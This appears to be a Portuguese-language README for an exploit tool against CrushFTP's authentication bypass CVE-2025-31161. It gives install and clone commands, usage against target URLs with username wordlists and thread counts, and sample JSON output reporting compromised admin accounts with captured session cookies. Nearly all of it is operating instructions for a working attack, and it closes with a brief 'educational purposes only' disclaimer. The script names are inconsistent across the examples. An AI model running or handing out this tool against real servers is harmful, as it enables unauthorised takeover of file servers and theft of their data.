
Ferramenta de Exploit CrushFTP CVE-2025-31161 🔓
CVE-2025-31161 é uma vulnerabilidade crítica de bypass de autenticação na Interface Web do CrushFTP. Ao manipular o cabeçalho HTTP Authorization, um atacante não autenticado pode obter acesso total sob qualquer nome de utilizador válido sem fornecer a palavra-passe correta.
pip install requests colorama urllib3
pip install requests colorama urllib3
git clone https://github.com/TX-One/CVE-2025-31161.git
cd CVE-2025-31161
python3 tx-crush.py -h
python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json
-h, --help mostra esta mensagem de ajuda e sai
-t, --target TARGET URL do alvo (ex.: https://example.com:8080)
-u, --users USERS Ficheiro com lista de nomes de utilizador
-o, --output OUTPUT Ficheiro JSON de saída
-T, --threads THREADS
Número de threads (padrão: 5)
--no-ssl Desativar verificação SSL
--timeout TIMEOUT Timeout do pedido (padrão: 15)
--retries RETRIES Número de tentativas (padrão: 3)
--force Ignorar verificação de versão
python3 exploit.py
-t https://vulnerable-server.com:8000
-u ./wordlists/common_users.txt
-o ./results/compromised.json
-T 10
--retries 5
--timeout 20
[
{
"target": "https://victim:8080",
"user": "admin",
"success": true,
"method": "Bearer",
"cookies": {"sessionID": "a1b2c3..."},
"server_version": "CrushFTP/9.3.12"
}
]
[
{
"target": "http://victim:8080",
"user": "admin",
"success": false
}
]
Aviso: Este projeto destina-se apenas a fins educativos e de pesquisa em segurança. Utilização responsável é necessária.